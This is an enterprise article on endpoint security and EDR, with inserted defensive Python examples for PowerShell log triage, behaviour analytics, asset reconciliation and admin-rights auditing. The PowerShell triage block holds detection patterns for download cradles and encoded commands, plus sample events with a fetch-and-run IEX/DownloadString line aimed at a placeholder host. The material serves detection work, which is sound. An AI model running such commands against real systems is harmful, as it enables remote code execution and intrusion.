ENDPOINT DETECTION AND RESPONSE (EDR)

Wednesday Mar 15th 2017 by Sue Poremba

Endpoint security provides a layer of protection for devices outside the firewall.

Endpoints may be the weakest link in network security. IT departments are tasked with ensuring the security of dozens of devices - desktops, laptops, mobile devices and now the Internet of Things (IoT) - that connect to the network. Here is a comprehensive look at endpoint security, its challenges, and what can be done to better protect the endpoints while improving overall IT security.

What is endpoint security?

Endpoint security means different things to different people, so we'll begin with a definition useful for enterprise IT departments. An endpoint is defined as any device connecting to the network from outside the firewall or perimeter. The rise in endpoints is largely due to the increasing numbers of employees who work offsite and need to access the network, as well as the different devices being used and the rise of the Internet of Things (IoT).

Endpoint security is the process of providing protection to those devices with the ultimate aim of protecting the network and an organization's data. Endpoint security is a critical part of an organization's overall security posture because devices that are outside a well-protected, internal network create pathways for attackers to bypass standard controls, says Rob Arnold, founder of Threat Sketch, which provides cyber security risk assessments for small and medium businesses. Even the best firewalls and controls are rendered useless when the internal network is extended to a point that goes beyond traditional perimeter security systems.

Examples of common endpoints in the workplace include:

·       Desktop and laptop computers

·       Smartphones

·       Tablets

·       Routers and WiFi

·       Point-of-sale devices

·       IoT devices

Endpoint security challenges

There are two problems that effective endpoint protection attempts to solve, according to Naveen Palavalli, director of product and solutions marketing at Symantec. They are emerging and advanced threats and disjointed endpoint security solutions that require separate agents.

Emerging and advanced threats

There are some very serious threats facing networks. Data breaches and ransomware, for example, are two of the biggest concerns for any organization. Exploit kits are another major infection vector wreaking havoc on enterprises. Symantec's research shows that on average, there are more than one million new malware variants created by attackers each day, and much of this malware uses a number of both new and known techniques to infiltrate the endpoint using email, browser, applications and devices as the entry point.

Palavalli said these emerging and advanced threats use both file-based and file-less techniques, such as in-memory attacks and PowerShell scripts. Attackers are abusing PowerShell, which is used for task automation and configuration management and is installed by default on most Windows computers, because most organizations don't have extended logging enabled. That makes malicious scripts largely invisible. Symantec found that 95 percent of the PowerShell scripts it analyzed were malicious.
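The gap Palavalli describes is closed in two steps: turn on Script Block Logging so that every script PowerShell runs is recorded (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log), and then actually look at those records. The block below is an added example, not code from the article or from Symantec: it triages constructed 4104-style event records with a small indicator list of the kind defenders use to spot script abuse. The event shape, the indicator regexes, their weights and the threshold are all assumptions chosen for illustration, not a vendor signature set.

```python
"""Triage PowerShell Script Block Logging events (Event ID 4104).

Added example. Windows only writes 4104 events once Script Block Logging is
enabled, via Group Policy or the registry value
HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging
\\EnableScriptBlockLogging = 1. The records below are constructed sample data.
"""
import re

# Indicators commonly used by defenders to spot script abuse: (name, regex, weight).
# Assumed for this example; a production rule set would be broader and tuned.
INDICATORS = [
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("download_cradle", re.compile(r"(DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b", re.I), 2),
    ("invoke_expression", re.compile(r"\b(Invoke-Expression|iex)\b", re.I), 2),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1),
    ("bypass_policy", re.compile(r"-ex(ecutionpolicy)?\s+bypass", re.I), 1),
    ("reflection_load", re.compile(r"\[System\.Reflection\.Assembly\]::Load", re.I), 2),
]


def score_script_block(text):
    """Return (score, [indicator names]) for the text of one script block."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def triage(events, threshold=3):
    """Return the events whose script block scores at or above threshold,
    highest score first. Each event is a dict with id, host, user and script."""
    flagged = []
    for ev in events:
        score, hits = score_script_block(ev["script"])
        if score >= threshold:
            flagged.append({"id": ev["id"], "host": ev["host"], "user": ev["user"],
                            "score": score, "hits": hits})
    flagged.sort(key=lambda f: -f["score"])
    return flagged


# Constructed sample 4104 records. The base64 in event 2 is a placeholder that
# decodes to a run of the letter A, not a real payload.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS-0142", "user": "CORP\\jdoe",
     "script": "Get-ChildItem C:\\Reports | Where-Object Length -gt 1MB"},
    {"id": 2, "host": "WS-0142", "user": "CORP\\jdoe",
     "script": "powershell -w hidden -ex bypass -e QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"},
    {"id": 3, "host": "SRV-DB01", "user": "CORP\\svc_backup",
     "script": "Import-Module SQLPS; Backup-SqlDatabase -ServerInstance . -Database Sales"},
    {"id": 4, "host": "WS-0077", "user": "CORP\\asmith",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/update.ps1')"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Events 1 and 3 are ordinary administration and score zero; events 2 and 4 are the ones an analyst would open first. The point is not the particular regexes but that without the 4104 events there is nothing to score at all.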

More formidable malware continues to be developed, zero-day attacks continue to accelerate, and ransomware continues to expand to new connected devices. These threats are designed to target enterprises through a wide variety of attack vectors. This makes endpoints even more vulnerable, and in turn, finding endpoint security solutions isn't a luxury; it's a necessity.

Disjointed endpoint security solutions

IT and security personnel are tasked with managing and maintaining multiple endpoint agents that often have fragmented security systems. These disjointed endpoint security solutions don't always mesh cleanly with the rest of the IT security infrastructure. Complicating the issue is the shortage of security professionals, and those who are handling security for the company may not be trained to deal with multiple security products or the challenges that endpoint security presents. Many of these solutions require a great amount of fine-tuning to make them work for the specific needs of that customer.

That's why more organizations should consider endpoint monitoring solutions that analyze connectivity activities and can identify anomalies that point to potential threats.

Endpoint security's greatest challenge: People

There is one endpoint security challenge that is almost impossible to monitor with software solutions or data protection controls. That's human behavior. We live in a world that moves at a fast pace and where corporate leadership expects high productivity. That means employees are multi-tasking, sometimes using two or three devices at once. They are often too distracted or in a hurry and don't think before they click on an email link or accept an update request. With one simple stroke, a single endpoint device has put the entire network at risk.

One problem is that employees aren't security savvy. It may be that the organization doesn't offer regular security awareness training opportunities or send out security-related bulletins. Employees can't practice good security if they aren't educated in what best practices are, or if they aren't informed of what the latest phishing threat looks like. Defending against these insider threats involves a combination of better awareness and endpoint security software.

Another issue is too many people think that security is someone else's problem, so they don't feel the need to use security tools. This is especially a problem in organizations that have instituted Bring Your Own Device (BYOD). Without policies about the types of devices allowed, security personnel aren't able to track what is accessing the network and whether or not those endpoints have security software installed. So the challenge for IT departments is to ensure every connected device is protected and getting software updates.

There are tools available to address the human problem of endpoint security. BYOD network access control (NAC) is described by Frost & Sullivan as "a self-contained solution capable of policy creation/management, authentication, endpoint assessment, enforcement, and remediation," and is an effective method to manage the myriad of devices using the network.

Behavior analytics is a newer endpoint security solution. According to Gartner's User and Entity Behavior (UEBA) Trends Report, behavior analytics monitors areas such as user behavior as well as the behaviors of the network and other entities connecting to it, and looks for patterns and activities that are out of the norm.
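The "out of the norm" test that UEBA tools apply can be made concrete with a small baseline-and-deviate model. The block below is an added example, not code from the article or from Gartner: it builds a per-user baseline (hosts used, hours of the day, logons per day) from a training window of constructed logon records, then flags later logons that come from a new host, at an unusual hour, or that push the day's logon count well above the user's usual volume. The record fields, the three-sigma rule and the one-logon floor on the deviation are assumptions.

```python
"""Baseline-and-deviate user behaviour analytics over logon events.

Added example. Real UEBA products use richer features and learned thresholds;
this shows the shape of the check with constructed sample data.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev


def build_baseline(events):
    """Per-user baseline: hosts seen, hours of day seen, logons per day."""
    base = defaultdict(lambda: {"hosts": set(), "hours": set(), "daily": defaultdict(int)})
    for ev in events:
        ts = datetime.fromisoformat(ev["ts"])
        b = base[ev["user"]]
        b["hosts"].add(ev["host"])
        b["hours"].add(ts.hour)
        b["daily"][ts.date()] += 1
    return base


def find_anomalies(baseline, events, volume_sigma=3.0):
    """Return one finding per anomalous event, in event order."""
    findings = []
    per_day = defaultdict(int)  # (user, date) -> logons seen so far today
    for ev in events:
        ts = datetime.fromisoformat(ev["ts"])
        b = baseline.get(ev["user"])
        reasons = []
        if b is None:
            reasons.append("user never seen in baseline")
        else:
            if ev["host"] not in b["hosts"]:
                reasons.append("new host")
            if ts.hour not in b["hours"]:
                reasons.append("unusual hour")
            per_day[(ev["user"], ts.date())] += 1
            counts = list(b["daily"].values())
            mu, sigma = mean(counts), pstdev(counts)
            # A floor of one logon stops a perfectly regular user from alerting
            # on a single extra logon (sigma would otherwise be zero).
            if per_day[(ev["user"], ts.date())] > mu + volume_sigma * max(sigma, 1.0):
                reasons.append("logon volume spike")
        if reasons:
            findings.append({"user": ev["user"], "host": ev["host"],
                             "ts": ev["ts"], "reasons": reasons})
    return findings


# Constructed training window: one user, two logons per working day, one host.
BASELINE_EVENTS = [
    {"user": "jdoe", "host": "WS-0142", "ts": f"2017-03-{d:02d}T{h:02d}:00:00"}
    for d in (13, 14, 15, 16, 17) for h in (9, 13)
]

# Constructed evaluation window: one normal logon, one off-hours logon from a
# file server, a user with no baseline, and six logons in one morning.
EVAL_EVENTS = [
    {"user": "jdoe", "host": "WS-0142", "ts": "2017-03-20T09:05:00"},
    {"user": "jdoe", "host": "SRV-FS01", "ts": "2017-03-21T02:30:00"},
    {"user": "asmith", "host": "WS-0077", "ts": "2017-03-21T10:00:00"},
] + [{"user": "jdoe", "host": "WS-0142", "ts": f"2017-03-22T09:{m:02d}:00"}
     for m in range(0, 60, 10)]

if __name__ == "__main__":
    for finding in find_anomalies(build_baseline(BASELINE_EVENTS), EVAL_EVENTS):
        print(finding)
```

The findings are exactly the three an analyst would want: the 02:30 logon to a server the user has never touched, the account with no history at all, and the sixth logon of a morning for a user who normally logs on twice a day. Everything else is silent.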

Protecting the endpoint from potential threats

The first and probably most important piece of solving endpoint security is determining exactly what endpoints you actually have, according to Richard Henderson, global security strategist at Absolute, a Canadian endpoint security and data risk management company. Many organizations struggle to achieve full visibility. Without full visibility, it's impossible to have security. You can't determine the security controls, security effectiveness and vulnerability posture of endpoints you can't see or manage.

Once you solve the visibility issue, the next step is to mitigate or minimize the vast majority of risks seen in networks now. That's why it's important to have a program in place for endpoint monitoring for the following areas:

·       Vulnerability management

·       Vulnerability patching

·       Sensitive data discovery, which should include data loss prevention (DLP) as well as identification of exfiltration of sensitive or potentially sensitive data through cloud storage or web-based applications
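Henderson's visibility step and the monitoring program that follows it come down to one reconciliation: compare what the asset register says you own with what the network actually sees, then check the state of what you do manage. The block below is an added example, not code from the article or from Absolute. It reconciles a constructed asset register (keyed by MAC address) against constructed DHCP/NAC sightings and reports four things: devices on the network that are not in the register, registered devices that have gone silent, managed devices with no security agent, and devices whose last patch is older than a threshold. The record formats, field names and the 30-day patch threshold are assumptions.

```python
"""Endpoint visibility check: inventory versus observed network, plus agent and
patch state. Added example with constructed sample data.
"""
from datetime import date

# Constructed asset register: MAC -> device record.
INVENTORY = {
    "aa:bb:cc:00:00:01": {"name": "WS-0142", "owner": "jdoe", "agent": True, "last_patch": "2017-03-10"},
    "aa:bb:cc:00:00:02": {"name": "WS-0077", "owner": "asmith", "agent": True, "last_patch": "2017-01-05"},
    "aa:bb:cc:00:00:03": {"name": "SRV-DB01", "owner": "it", "agent": True, "last_patch": "2017-03-01"},
    "aa:bb:cc:00:00:04": {"name": "LT-0310", "owner": "bwong", "agent": False, "last_patch": "2017-03-12"},
}

# Constructed DHCP/NAC sightings: (MAC, IP, last seen). The last one was never registered.
OBSERVED = [
    ("aa:bb:cc:00:00:01", "10.0.5.12", "2017-03-14"),
    ("aa:bb:cc:00:00:02", "10.0.5.40", "2017-03-14"),
    ("aa:bb:cc:00:00:04", "10.0.9.7", "2017-03-13"),
    ("de:ad:be:ef:00:99", "10.0.9.88", "2017-03-14"),
]


def reconcile(inventory, observed, today, max_patch_age_days=30):
    """Compare register and sightings as of `today` (ISO date string).

    Returns a dict of sorted lists:
      unknown     MACs seen on the network but absent from the register
      silent      registered device names never seen on the network
      no_agent    registered devices without a security agent
      stale_patch registered devices patched more than max_patch_age_days ago
    """
    as_of = date.fromisoformat(today)
    seen = {mac for mac, _, _ in observed}
    unknown = sorted(mac for mac in seen if mac not in inventory)
    silent = sorted(rec["name"] for mac, rec in inventory.items() if mac not in seen)
    no_agent = sorted(rec["name"] for rec in inventory.values() if not rec["agent"])
    stale_patch = sorted(
        rec["name"] for rec in inventory.values()
        if (as_of - date.fromisoformat(rec["last_patch"])).days > max_patch_age_days
    )
    return {"unknown": unknown, "silent": silent,
            "no_agent": no_agent, "stale_patch": stale_patch}


def coverage(inventory, observed):
    """Fraction of observed devices that are registered and carry an agent."""
    seen = {mac for mac, _, _ in observed}
    managed = sum(1 for mac in seen if mac in inventory and inventory[mac]["agent"])
    return managed / len(seen) if seen else 1.0

if __name__ == "__main__":
    report = reconcile(INVENTORY, OBSERVED, "2017-03-15")
    for key, names in report.items():
        print(f"{key:12s} {names}")
    print(f"managed coverage: {coverage(INVENTORY, OBSERVED):.0%}")
```

Each list maps to an action: the unknown MAC is a device to identify or quarantine, the silent server is one to confirm is still where the register says it is, the agentless laptop is a BYOD-style gap, and the stale workstation goes to the patching queue. Run against real DHCP leases and a real asset register, the same four lists are the visibility report Henderson describes.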

It takes time to develop a good security posture and endpoint security is no exception. It can't be done all at once or cover everything instantly. Critical needs and critical users must receive the most immediate attention, with additional protections and controls based on different criteria such as leadership levels, amount of network privileges and access, or BYOD/mobile connectivity. It's a matter of recognizing who or which devices are most likely to be targeted and would create the most damage from an attack.

Endpoint protection steps

RJ Gazarek, product manager at Thycotic, suggested the following simple steps to protect the network from endpoint threats:

·       Remove/manage administrative accounts on endpoints: Regular users do not need administrative rights to do their everyday jobs. For those applications that require administrative rights, the organization can implement an application control solution that can provide administrative rights to those approved programs that require it. Removing administrative access on the endpoint can mitigate much of the damage that an attacker can cause if they are able to compromise that endpoint.

·       Keep systems patched and up to date: Vulnerabilities are discovered all the time, and malicious attackers are keeping a close watch as these vulnerabilities are discovered. If the vulnerability is particularly dangerous, attackers will start sweeping across businesses attempting to find organizations that didn't patch the vulnerability in order to gain access. Your policy and procedure must enforce keeping systems on the network up to date.

·       Implement advanced authentication: Some of the breaches that occurred in 2016 were secondary breaches due to a previous breach. Usually this happens when someone uses the same password across multiple sites and devices. If an employee's account was compromised in a data breach and they use the same password to log in to their system, then it's easy to access that system. If the organization implements advanced authentication, the attacker won't have access to complete authentication abilities, even if the password is stolen.

·       Security awareness and training: Continued awareness and training on password, security, and electronic use best practices can go a long way. Unfortunately, an organization cannot rely solely on training, because again, humans make mistakes – and they can easily be the weakest link in a strong security program.
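Gazarek's first step is the one most organizations can measure immediately: who is actually a local administrator on each endpoint? The block below is an added example, not code from the article or from Thycotic. Given per-host membership of the local Administrators group, as an endpoint agent or inventory tool would export it, it flags members that are not on an approved list and ranks accounts by how many hosts they administer, because an account that is admin on many endpoints is the one whose stolen password does the most damage. The host data and the approved list are constructed.

```python
"""Audit local administrative rights across endpoints.

Added example with constructed data. Approved membership is kept small on
purpose: the built-in account, the domain admins group, and a helpdesk group.
"""

# Constructed: host -> members of the local Administrators group.
LOCAL_ADMINS = {
    "WS-0142": {"Administrator", "CORP\\Domain Admins", "CORP\\jdoe"},
    "WS-0077": {"Administrator", "CORP\\Domain Admins", "CORP\\asmith", "CORP\\helpdesk"},
    "SRV-DB01": {"Administrator", "CORP\\Domain Admins", "CORP\\svc_backup"},
    "LT-0310": {"Administrator", "CORP\\Domain Admins", "CORP\\helpdesk", "LT-0310\\bwong"},
}

# Constructed approved list. Anything else is a candidate for removal or for
# an application-control exception instead of standing admin rights.
APPROVED = {"Administrator", "CORP\\Domain Admins", "CORP\\helpdesk"}


def unapproved_admins(local_admins, approved):
    """host -> sorted list of members not on the approved list (hosts with none omitted)."""
    out = {}
    for host, members in local_admins.items():
        extra = sorted(members - approved)
        if extra:
            out[host] = extra
    return out


def admin_reach(local_admins):
    """(account, host count) pairs, most hosts first, then by name.

    Accounts at the top are the ones to protect hardest: unique per-host
    passwords for the built-in account and strong authentication for the rest.
    """
    counts = {}
    for members in local_admins.values():
        for member in members:
            counts[member] = counts.get(member, 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


def blast_radius(local_admins, account):
    """Hosts an account could administer if its credential were stolen."""
    return sorted(host for host, members in local_admins.items() if account in members)

if __name__ == "__main__":
    for host, extra in unapproved_admins(LOCAL_ADMINS, APPROVED).items():
        print(f"{host}: remove or justify {extra}")
    for account, n in admin_reach(LOCAL_ADMINS):
        print(f"{account}: admin on {n} host(s) -> {blast_radius(LOCAL_ADMINS, account)}")
```

The first report is the cleanup list for step one; the second shows why step three matters: the accounts that are admin everywhere are exactly the ones where a reused or stolen password turns one compromised endpoint into all of them.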

Endpoint encryption and access controls

Endpoint encryption is a critical layer of endpoint security. Encryption protects the data on the devices themselves and during transmission, keeping outside actors from being able to copy or otherwise transfer that information. Full disk encryption is even more effective, as it encrypts the entire hard drive, protecting not just the data but the operating system and applications too. In this case, the encryption key is required at boot time, and once applied, the system will decrypt enough to run normally.

Another data protection control is application control, which prevents unauthorized users from executing applications on the endpoint device. Not only does this protect the endpoint from outsiders taking over applications, but it can control what authorized users of the device can download or access. It also protects the network from potential data threats from departing employees by locking them out of enterprise applications.

A VPN is another critical endpoint protection tool that organizations should be using.

Endpoint security vendors and products

Many endpoint products are "one trick" solutions, said Palavalli, relying on one specific technology. The most reliable endpoint security solutions are expansive, using a mix of machine learning, exploit prevention, threat intelligence, behavioral analytics, multi-layered protection, endpoint detection and response, and integration with other security tools. Four things to consider when looking for an endpoint security vendor or specific product:

Is this the best prevention solution for your needs? If you deal with credit card transactions, does the solution cover point of sale security, for example? Is it a multi-layered protection that defends the endpoint from every attack vector, whether that is email, web browser, applications or devices like a USB stick? Will it prevent lateral movement and communication to command and control servers?

We know that breaches are inevitable and there will be regular attacks against your endpoints, no matter how large or small your organization is. Your endpoint security solution should allow you to quickly identify any breach and aid in expedited investigation and response.

Other considerations:

·       Does the endpoint security software offer robust tools for remediating every artifact of malware?

·       Does the endpoint security solution integrate with the rest of the security infrastructure, such as network security, IT ticketing systems and SIEMs?

Endpoint security is less a matter of specific products than it is a deliberate deployment of existing capabilities and policies.

The experts interviewed for this article said the following solutions could help protect enterprise networks from endpoint security risks:

·       AlienVault, a multi-point solution provider

·       Bitdefender, which works with a variety of endpoints and platforms and is good at catching false positives

·       Symantec Endpoint Protection 14 offers complete endpoint security with a single agent and integrates with Symantec Advanced Threat Protection Endpoint, the company's endpoint detection and response tool for incident investigation.

Other vendors offering comprehensive endpoint protection solutions:

·       Trend Micro

·       Kaspersky

·       Sophos

·       Intel Security (formerly McAfee)

·       Check Point

·       SentinelOne

·       CrowdStrike

·       Cylance

·       Invincea

·       Carbon Black

·       Palo Alto Networks

·       F-Secure

Top EDR vendors

The most advanced form of endpoint security is endpoint detection and response (EDR), which offers continuous monitoring and response to advanced security threats. For our in-depth reviews of EDR products, see Top 10 Endpoint Detection and Response (EDR) Solutions.
